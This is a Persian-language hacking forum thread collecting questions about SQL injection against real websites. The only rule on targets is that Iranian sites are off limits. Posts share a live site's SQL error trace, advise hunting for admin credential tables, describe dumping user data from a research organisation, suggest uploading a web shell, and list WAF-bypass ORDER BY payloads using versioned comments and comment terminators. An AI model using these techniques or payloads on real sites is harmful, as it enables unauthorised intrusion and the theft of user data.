discord icon
سرور دیسکورد گاردایران
R3dHat

تاپیک جامع سوالات SQL Injection

پست های پیشنهاد شده

بسم الله الرحمن الرحیم

 

 

در بخش سوالات sql injection قرار می گیرد

 

اعضای محترم انجمن سعی کنن سوالات خود را

 

در این تاپیک بپرسن

 

تا به صورت منظم و یکپارچه در بیاد

 

*حتما قوانین رو در بخش قوانین انجمن مطالعه کنن

 

*به هیچ وجه تارگت ایرانی قرار ندید بررسی نمی شود و حذف می شود

 

*لطفا در صورت دریافت نکردن پاسخ صبر داشته باشید و پشت سر هم ارسال نکنید

 

کسی نیست ؟ میشه بررسی کنید ؟ کسی جواب نمیده ؟

 

*با افرادی که بر خلاف قوانین عمل کنن برخورد خواهد شد

 

 

 

موفق باشید ;)

 

 

 

هماهنگ شده با MR.Iman

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

خب اولین اغازگر این تاپیک منم

 

یه سوال داشتم

 

ایا میشه با ارور

 

Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') LIMIT 1' at line 1 in /home/mbp/domains/r/public_html/includes/idiorm.php:320 Stack trace: #0 /home/mbp/domains//public_html/includes/idiorm.php(320): PDOStatement->execute(Array) #1 /home/mbp/domains//public_html/includes/idiorm.php(1536): ORM::_execute('SELECT COUNT(*)...', Array, 'default') #2 /home/mbp/domains//public_html/includes/idiorm.php(494): ORM->_run() #3 /home/mbp/domains//public_html/includes/idiorm.php(606): ORM->find_one() #4 /home/mbp/domains//public_html/includes/idiorm.php(557): ORM->_call_aggregate_db_function('COUNT', '*') #5 /home/mbp/domains//public_html/index.php(95): ORM->count() #6 {main} thrown in /home/mbp/domains//public_html/includes/idiorm.php on line 320

 

کار خاصی انجام داد ؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در ۱ ساعت قبل، xalpha گفته است :

سلام خسته نباشید
اگه توی تیبل های یه سایت هیچ تیبلی مربوط به ادمین و یوزر ..... نبود چه کاری میشه کرد؟

نمیشه که نباشه

ممکنه به زبانی دیگه باشه اول چک کنید ببینید سایت چه کشوریه

بعد admin و پسورد رو به اون زبان ترجمه کنید که بدونید دنبال چی قراره بگردید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 4 دقیقه قبل، proxy گفته است :

نمیشه که نباشه

ممکنه به زبانی دیگه باشه اول چک کنید ببینید سایت چه کشوریه

بعد admin و پسورد رو به اون زبان ترجمه کنید که بدونید دنبال چی قراره بگردید

ایرانی بوده برزیلی بوده
تو ایرانیش که فقط تیبل محصولات با تماس بود همینا نتیجه نگرفتم
 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

باسلام به همه دوستان

دوست عزیز در شرکت های بزرک میان در ایکس چنج سرور یه کاری میکنن البته ینده تارکت شمارو ندیدم و بصورت کلی میگم که این چنین هم میشه مثلا دانشگاهی که  خود بنده ....

احتمالا شما با چنین سرورهایی برخورد کردید چون بنده با دوست عزیز 1tedروی سروری کار میکردیم برای یک سازمان پزوهشی بود که اسکیوال داشت و ما کیه کاربرانو در اوردیم بجز ادمین

که بعدا فهمیدم زیرساختشون این چنین بوده

شما میتونین با جمع اوری اطلاعات دقیق از سرور بفهمید که ایا یوزر ادمین در داخل یکی از اون تیبل هاس یا در یک سرور دیکه قرار داره

باز یادم رفته بود اکه با ابزارهای تزریق خوب کار کرده باشید با همونا میتونید مستقیم یک اپلودر یا شل اپلود کنید

Untitled.png

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در ۱ ساعت قبل، reza79 گفته است :

سلام دوستان کسی بایپسی برای دستور order+by+99999-- بلده؟

سایت به اعداد حساس هست

درود،

احتمالا نیاز به بایپس WAF دارید
متود های زیر رو تست کنید:

 

+ORDER+BY+99999
+/*!13337ORDER*/+/*!13337BY*/+99999
+/*!50000ORDER*/+/*!50000BY*/+99999
+OrdER+bY+99999

اخر هرکدومشون هم کاراکتر های زیر رو بزارید:
 

-- -
--
%23

به طور مثال
 

+OrDEr+bY+99999 -- -

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری